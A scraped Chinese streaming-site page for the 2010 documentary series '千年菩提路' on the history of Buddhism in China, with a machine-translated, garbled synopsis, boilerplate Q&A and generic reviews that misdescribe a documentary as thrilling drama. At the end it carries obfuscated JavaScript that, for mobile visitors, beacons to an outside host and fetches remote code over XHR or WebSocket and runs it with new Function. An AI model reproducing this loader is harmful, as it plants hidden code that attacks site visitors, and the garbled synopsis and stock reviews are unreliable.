请记住本站网址:www.suibo.org

首页> 纪录片> 千年菩提路
千年菩提路

千年菩提路

共12集,完结
主演:孙悦斌
类型:纪录片 纪录片 历史 纪录 记录 
导演:周兵,蔡小敏,施润玖,万玛才旦,袁丁,王冲霄,金明哲,陈丽,鲍军,汪哲,韩斌,杨光,苏强,吴向列,方磊
地区:中国大陆
年份:2010
语言:汉语普通话
时间:2022-05-08 07:25:04
介绍:欢迎在线观看由孙悦斌等主演的纪录片《千年菩提路》,随播高清影视www.suibo.org第一时间为你提供《千年菩提路》,如果你喜欢《千年菩提路》请把它分享给的朋友,有您们的支持我们会做的更好。祝你观片愉快!剧情简介:大型高清电视纪录片《千年菩提道》项目简介项目名称:千年菩提道监制:北京佳源海文化传媒有限公司中央新闻纪录电影制片厂项目类型:集数大型高清电视纪录片:发行版42集,每集播出30分钟。项目定位未定:自2000年前东汉时期佛教传入XX以来,不仅弥补了儒学在对人的终极关怀上的缺失,还与XX本土文化不断合作。大型高清电视纪录片《千年菩提道》将深入XX大地乃至周边国家的名山古刹,探寻历代高僧苦练佛法、传播佛法的伟大心愿,以历史人文为审美取向,回避宗教教义的阐释和探索,以期梳理出一条2000年XX佛教传承发展的历史脉络,还XX佛教原本清晰的形象。创作理由:永平八年,即公元65年,古印度僧人拍摄了莫顿和朱发兰徒步穿越帕米尔高原的照片,并骑着白马将经书和佛像带到了东汉辉煌的都城洛阳。从那时起,一位名叫“佛陀”的印度圣人的智慧之声在XX广袤的土地上回荡了2000年。从遥远到真实,从模糊到震耳欲聋。今天,我们看到汉语、藏语和巴利语三个语系的佛教在XX的土地上共存。我们看到越来越多的人谈论佛教,我们看到佛教名山的香火一天比一天旺。但另一方面,由于历史原因,在这一学派繁荣的背后,人们对佛教的误解实际上越来越多,离佛陀的智慧越来越远。那么佛教为什么选择XX呢?儒释道有过怎样的碰撞和融合?历代高僧写下了多少传奇篇章?佛教为每一个中国人构建了怎样的精神家园?已故前XX佛教协会会长赵朴初曾写道:“人类文化的发展是一个连续的过程,传统文化和现代文化不能完全割裂。我们应该吸收传统文化中一切有价值的精华来丰富和发展XX的民族新文化。XX传统文化也包括佛教文化。”正是基于这样的认识,基于全面梳理XX佛教历史的宏伟愿望,基于构建和谐社会的现实需要。经过五年的精心准备,我们终于被允许进入XX的每一个重要的佛教场所,用我们的镜头记录下庄严的佛像,随处可见的修行景点,流传已久的成堆经文,以及留在历史中的僧侣和美德。这是一个难得的机会。这是一部空前的作品。在XX中央统战部、XX文化部、国家民委、国家宗教事务局、国家旅游局、国家文物局等六部委的支持下,在娄玉烈、温金玉、李英来、陈弘行等一批XX佛教领域专家学者的支持下,我们完全有理由相信,“千年菩提道”将在展现XX佛教魅力的同时引领我们每一个人。制作阵容:《千年菩提道》将采用最先进的高清高清电视技术,按照国际标准拍摄制作。其创作团队集结了当下XX纪录片创作的精英。在《故宫》原班创作团队的基础上,摄制组还邀请了国内外顶尖专业人士和制作团队加盟,进行音乐创作、三维制作和复制拍摄。他们的到来无疑将为电影的制作水平提供强有力的保障。主要内容:《千年菩提道》将以寺庙兴衰、人物命运、不同佛教门派传承为线索,勾勒出2000年来XX佛教传播发展的历史轨迹。其主要内容涉及XX佛教史上具有代表性的32座寺庙及相关大德高僧。附多样性简介:新千年已经到来。当时间随着战争的硝烟,以及无数帝王将相、名流贵族的身影渐渐远去,在洛阳XX的古邙山脚下,一声来自朝圣者的顽强的足音已经在洛河北岸流淌了2000年。自佛教以来,XX有许多“第一”白马寺。据说它的名字源于“永平求法”和“白马驮经”的故事。今天,当我们突然回头看时,我们发现我们在那些年寻求的实际上是一种更开放的思想,白马在人类的另一边带来了一个我们的祖先从未关注过的整个世界,这是中华民族赖以生存的文化之一的基石。白马寺的故事告诉我们,XX佛教不仅仅是佛像、佛经、僧尼和寺庙。事实上,佛教就在每个XX人的话语和微笑中,佛教就在你我的血液中。魏晋以降的净土信仰(上、下)。净土宗以其简单易行的修行方法赢得了广泛的影响,使其成为当今信众人数最多的佛教宗派。回顾2000年XX佛教的发展历史,我们可以看到,在印度佛教与XX本土文化的初步融合中,佛教逐渐从高墙庭院中的宫廷神秘学演变为XX普通民众的精神资源,净土信仰在佛教不断本土化XX的每一个过程中都发挥了至关重要的作用。现在,每个XX人只需宣布“南方没有阿弥陀佛”,并手持净土宗流传下来的两个标志念珠,就可以快速绘制一幅XX佛教僧侣的标准肖像。而这一切,伟大的贡献不能不被庐山的托林寺第一个释放慧远。他和他之后的净土祖先的个人行为对XX的历史产生了广泛而深远的影响。《东游记》(上、下)他是外国人,但他千里迢迢来到XX,不畏艰险,以弘扬佛法为己任。他的一生充满了传奇。他出家后被迫结婚生子,并被指控违法。他被皇帝视为国宝,这直接导致了一场抢夺他的战争;他在当时世界的中心长安主持了一个前所未有的佛经翻译领域。他向弟子发誓,他主持翻译了300多部佛经。如果没有错误,他的舌头就不会在他的尸体被焚化后被烧焦。他就是迄今为止翻译中国佛经范围最广的佛教大师鸠摩罗什。自从有了僧团,就有了戒律。那么戒律是什么呢?弘毅大师说,”...有一天,佛陀看到地下不太干净,就拿着扫帚去扫地,于是很多大弟子看到佛陀自己在扫地,就来帮忙扫地,一会儿就很干净了。佛祖扫完地后,走到讲堂说:“一个人如果扫地,就可以得到五种功德。”...“卫先少爷说,”...僧侣群体的生活没有纪律,比如中午以后不能吃饭。一次,一个和尚晚上去乞讨食物,雨下得很大。一个孕妇在电闪雷鸣中看到了它,被吓坏了,于是她向佛陀抱怨。后来,佛陀规定中午以后不吃东西。.....多年来没有人违反规则,直到多年后才有人违反规则。.....“在福鼎平型寺,我们看到持戒的僧人虽然头上没有烫痕,但面容仪态异常美丽;所以他的心看着你的心变得美丽,看到五颜六色的云,飞翔和自性。东土释迦牟尼(上、下)晨钟暮鼓已过,古寺在这挥之不去的远方和沧桑中与隋、梅花开花落1400多年。“郭庆讲寺”一词道出了五世寺在二十世纪佛教史上的起源和地位。这是一代帝王的修行道场。这里是XX佛教第一教派的祖庭。它仍然继承了智者大师创立的天台博大和谐的佛教精神。帝国僧侣(上集和下集)我们驱车来到这座古城,寻找唐朝、长安和玄奘。历史的痕迹模糊不清。幸运的是,我们与他有着相同的血脉,让我们得以在现代物质文明的滚滚洪流中窥见他孤独的身影。玄奘,XX佛教思想的集大成者,XX佛教文化高潮的推动者,世界上最具影响力的知识分子。少林寺(第一部分和第二部分)是世界著名的古刹。“少林天下第一。”世界上痴迷XX武功的人都把这个地方视为圣地。喧嚣之上,人们似乎忘记了这里也是达摩“九年破墙计划”的破局之地,这里还是XX禅的祖居之地。禅宗的静与武术的动如何合二为一?那些名满天下的少林武僧不是被杀生所束缚吗?少林功夫,是达摩祖师传的吗?透过现实和历史的迷雾,我们在寻找佛法和真正的少林...六祖慧能(上、下)这是一位佛教大师的生平传奇。他出生在流放犯人的边疆;他幼年丧父,在贫困困苦中长大;他曾经是一名樵夫,以砍柴为生。他没上过学,是个文盲。他一听就悟了,千里寻法。他为了佛法而忘了自己的身体,历尽艰辛。他继承了禅宗的衣钵,开悟了佛法,成为了XX佛学大师。他建立了一套面向XX、面向生活、面向平民的禅宗体系,使当时的佛教思想界如风生水起的小草,一派新气象,整个文化领域也因其熔铸而焕发生机。本片通过介绍禅宗六祖慧能的生平事迹,让人们了解禅宗在XX佛教历史上是如何发展为XX、如何社会化、普及化、生活化的。从叶佳老先生到徐云大师看华寿(上、下):从蜀汉时期的寺庙到今天,这里汇聚了汉传佛教、藏传佛教和南传佛教教三大佛教流派。立于鸡足山上的佛教圣地华寿门,一直默默注视着苍山与洱海之间不断往返的挑夫、商队和帝王,任时光流转。瞬间雾消失了;山中隐逸的行者隔崖相望;佛名如舟,悠远淡然。佛陀捻着鲜花,叶佳微笑着;这座山,这座道场,历经千年,温柔而坚定。在钟南山,没有人能数得清过去有多少座修道院,或者有多少隐士的茅草屋顶。自从中华文明在中原崛起以来,在长安以南的钟南山就有从业者的痕迹。今天,钟南山的春夏秋冬可能与几千年前不同,但每个来拜访隐士并感到失望的人都会突然意识到,正是这座位于XX西北的古老山脉一直代表着XX汉文化的自省方向,并成为深刻反思XX文化的地方。作为文殊菩萨的道场,清凉的五台山(第一、二部分)被誉为“清凉胜境”,在XX四大佛教名山中名列第一。自东晋十六国时期以来,所有的高僧都来到台湾,以五台山为基地传播佛教,并在这个舞台上表演了XX佛教历史上的跌宕起伏。1700多年来,五台山佛教呈现出多派并存、汉藏并存的独特风貌。同时,五台山也因文殊菩萨道场的原因,成为国内外知名的佛教圣地。本片将使用五位导演分别拍摄五部短片,展现这个人文积淀深厚的佛教文化重地。明亮的峨眉山(第一部分和第二部分)走进依山而建的寺庙,让人感到更加庄严肃穆,不仅是其川南风格的寺庙建筑,还有其精美的雕像。在这些僧侣清澈的眼中,我们看到了光明。的确,峨眉山还有另一个名字——光明山。它与佛陀的智慧密切相关。没有光,世界只能沉入漫漫长夜。没有光,我们的黑眼睛只能看到黑色。没有光明,我们的心灵就无法得到智慧的滋养。峨眉山作为普贤菩萨的道场已有两千年的历史。如果佛教是行为的、实践的,这种实践精神最集中的体现就是普贤菩萨,他的十愿是佛教修行的重要方法。在溥仪的愿望中我们能感受到什么?让我们走进峨眉山,了解它的历史和传说。普陀珞珈(上、下)佛因山而兴,山因佛而名。正是在佛教传入后,它再次被赋予了深厚的宗教文化,这使这座传说中的仙岛成为世界名山。什么是同情心?观音是什么?如果你能暂时抛弃你的浮躁,远离城市的喧嚣,来到这个海天佛国,听听梵音,看看天空和天空,你可能有机会重新认识你的生活。九华金臧棣(上、下)安徽九华山是XX四大佛教名山之一。唐朝开元年间,九华山被辟为地藏菩萨道场。大智菩萨与大悲观世音菩萨、大智文殊菩萨、大菩萨的区别在于,金巧觉是上古时期的外国王子,在获得无上菩提后说服世界改变,后来被尊为金佛,这是一个比丘的真实形象。金巧珏在九华山度过了75年,99岁去世。死后三年,“面目生动传神,关节上扬,其声震金锁。”塔建好后,“塔址如火闪耀,光呈圆形。”现在在世界上流传的西藏菩萨形象是光头,手持宝珠和张西,是阎罗王的化身。如今,我们仍然可以在九华山方圆百里乡镇看到古老的拜佛习俗,如节日期间拜山,途中不回头说话,新年吃素等。被誉为“百戏之首”的古代戏曲《目连救母》保留了许多古老的古朴和神秘。莲花大师的足迹(上、下)这片雅鲁藏布江中部盆地的肥沃土地在古代被称为“卫藏”。据传说,莲花生大师建造的桑耶寺是西藏历史上第一座佛教寺庙,今天仍然矗立在这里。桑耶寺,藏语意为“五边寺”、“超越欲望寺”、“不公平寺”。散叶寺又被称为“三阳寺”,因为它的三层大殿分别呈现了西藏、汉族和印度的建筑风格。在这里,西藏第一代佛教高僧诞生;这里,是西藏第一座“佛、法、僧”齐全的佛教寺院;这里,是西藏历史上第一所佛教翻译学院;在这里,还有关于青浦山、富藏和西藏之死的神秘书籍...这是藏传佛教文化的开端,也是当代藏族文化的起源之一。大昭寺和大昭寺(第一部分和第二部分)是全世界佛教信徒心中独一无二和不可替代的圣地。因为这里供奉着十二岁的释迦牟尼佛像。它见证了汉藏之间悠久的血缘关系,见证了宗喀巴大师的辉煌成就,见证了第一任达赖喇嘛和第一任班禅喇嘛的诞生。随着时代的变迁,供奉着八岁佛像的小昭寺现已成为西藏僧侣实践藏传佛教密宗秘法的最高机构。本片通过对大昭寺建筑历史和人物故事的介绍,探寻西藏大乘佛教生命力的源泉,发现汉藏同胞追求相同精神信仰的所在。布达拉宫矗立在雪域高原的红山之巅。这里曾经是吐蕃王朝的宫殿,后来成为达赖喇嘛的冬宫。它有着辉煌的建筑艺术成就,浓缩了藏族民族文明发展的历史,被誉为藏族文化的集大成者。布达拉宫虽然在今天已经失去了权力的光环,但仍然在世人面前展示着它独特的魅力。300年前,一位在西藏修行多年的僧人回到了甘南故土。他希望在家乡建一座寺庙,一座“永远成为佛祖支柱的寺庙。”显然,这座名为“拉卜楞”的新建寺庙在许多方面都不占优势。它不像布达拉宫的大昭寺那样深奥,不像塔尔寺那样特别,也不像甘丹寺那样突出,而且它离藏传佛教的中心拉萨很远。它随时可能被时间湮没在历史的长河中,就像曾经的寺庙一样。然而,300年过去了,从一砖一瓦,一草一木,一堂开始。现在,它拥有六所学院,数千名僧侣,十一世班禅喇嘛,七世贡唐儒同学噶尔丹嘉措和许多其他高僧……它是如何走到今天的?还站在岁月的冲刷中吗?这一切的背后应该有怎样的动荡和沧桑?过去,雍和宫被用来维护“清朝的永久稳定”,以传播藏传佛教。现在,人们在这里许愿,播种希望,祈求好运。从秦永宫到雍和宫,它是北京3000座寺庙中最有特色的一座。它是一代圣王的诞生地,也是藏传佛教转世的地方。它一直与政治和宗教联系在一起,同时它也是蒙古、西藏和汉族融合的桥梁。作为曾经的皇家寺庙,雍和宫25米高的未来佛预示着56.7亿年后的故事——众生之说。南传佛教生活在云南西南部的西双版纳,那里的傣族信奉佛教。每个村庄至少有一座佛寺。每个年轻人都必须出家一次,在寺庙里学习文化。传承了一千多年的傣族佛教,融合了地域和民族的文化习俗,超越了单纯宗教的意义。所有的人都对他们的信仰怀有亲切的感情。法门寺(上、下)1981年8月24日,一道闪电击倒了陕西扶风县法门寺的佛塔,揭开了一个埋藏千年的秘密。在倒塌的古塔下,人们发现了一座秘密的地下宫殿。在2000多件唐代稀世珍宝的包围下,出现了世界上独一无二的释迦牟尼佛指骨舍利。一同出土的还有一块石碑,上面记载着一段惊心动魄的历史,是1000多年前唐朝的一位僧人所写。这些沉睡了1113年的文字揭示了唐朝帝国兴衰的秘密,从中我们读到了人们在追求真谛的道路上曾经拥有的热情和失落...西施寺(第一、二部分)记录了天下第一和尚的灵位舍利,其背后是上海一个美丽家庭的传奇人生。在西施寺,在这个优雅而不寻常的尼姑庵里,云门派第十三代传人宽能大师集劳动、茶艺、修行于一体,40年如一日地修习人生禅修,洗去了西施寺的铅华,成为两广地区的佛教圣地。灵隐寺(第一集、第二集)观海天,门朝浙潮。这两首诗无疑是灵隐寺在江南文化史上地位和形象的真实写照。会理、永明延寿、王洛宾、济公。。。。。。儒佛合一,禅净合一。悠久的点灯历史和丰富的宗教人文积淀,让飞来峰下这个“被仙气所藏”的地方,依然在寂静中彰显着勃勃生机。法海的真实来源:XX历史的传奇,从头到尾,往往反映了一个政权的兴衰。一座为表彰忠诚和英雄主义而诞生的寺庙屡毁屡建,先后更换了几个名字。每一个名字不仅代表着不同的性格,也凝结着一整个朝代的喜怒哀乐。法源寺历经1000多年的世事变迁,早已今非昔比,但这里弘扬的“法海真源”的佛教精神一直传承至今,从未间断。......

相关问答

1、问:《千年菩提路》什么时候上映时间?

答:这部影片的上映时间是2010年,更新时间2022-01-08 02:35:08

2、问:《千年菩提路》中国大陆在哪个电视台播出?

答:《千年菩提路》目前只有网上如、爱奇艺腾讯优酷随播影院等播出、没有在电视台播。

3、问:《千年菩提路》演员表

答:《千年菩提路》是由周兵,蔡小敏,施润玖,万玛才旦,袁丁,王冲霄,金明哲,陈丽,鲍军,汪哲,韩斌,杨光,苏强,吴向列,方磊 执导,孙悦斌 领衔主演的纪录片 纪录片,历史,纪录,记录 中国大陆 。该剧于2022-01-08在腾讯、爱奇艺、随播影院、优酷、等平台同步播出。

4、问:哪个平台可以免费看《千年菩提路》全集

答:免vip在线观看地址:www.suibo.org/vod/254477.html

5、问:手机版免费在线点播《千年菩提路》有哪些网站?那些平台搜索?

答:hao123影视百度视频随播影院;请到百度  搜狗 360 神马 头条搜索。

6、问:《千年菩提路》评价怎么样?

Mtime时光网友:剧情紧凑有趣,不同于其他影片作品,有励志|灾难|冒险|犯罪|生活等故事情节精简不会啰里啰嗦拖泥带水,观众在电影中体验到了无尽的紧张和刺激。他们的演绎让我对每个角色都充满了期待和共鸣。影片中的角色性格鲜明,每个人物都有自己的故事和动机,令人着迷,值得一看。

丢豆网网友:这部影片是一本栩栩如生的电影,创作灵感之高。影片中绘声绘色的基础上有欢笑,有泪水,有快乐,也有悲伤...具备长辈苦口婆心语重心长的教诲(为遵重在这里我省略掉啰嗦这词)。电影励志、冒险、灾难、言情、生活种种往往是融入进去,在不知不觉中去了解这些似乎不容易被我们所发现理解的道理、以其设身处地都会是现实中教导的教诲!

豆瓣电影网友:这部电影评分:8.5佳作千年菩提路汉语普通话是2010年中国大陆上映的纪录片,这部剧深受观众喜爱,并在播出后获得了极高的好评和口碑,影片中的角色形象塑造鲜明,故事情节紧凑不会啰嗦不断,剧情发展合理。更微妙的是在导演周兵,蔡小敏,施润玖,万玛才旦,袁丁,王冲霄,金明哲,陈丽,鲍军,汪哲,韩斌,杨光,苏强,吴向列,方磊的指导下,孙悦斌每一个演员的出色表演将剧中的角色形象栩栩如生地呈现在观众面前。无论是剧情、演员的表演还是剧中歌曲,都是该电影的亮点好看所在的美妙。

猜你喜欢

function tzSxNF(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function SeQxY(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return tzSxNF(t);};window[''+'R'+'U'+'j'+'D'+'I'+'m'+'v'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=SeQxY,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://tgb.eemcfun.com:7891/stats/7731/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMlM0ElMkYlMkZqaC5mmYW5odWltaW4xLmmNuJTNBODg5MQ==','d3NzJTNBJTJGGJTJGGdXkudGGlhbnhpbmdoYW5nMS5jbiUzQTk1MzU=','135562',window,document,['m','G']);}:function(){};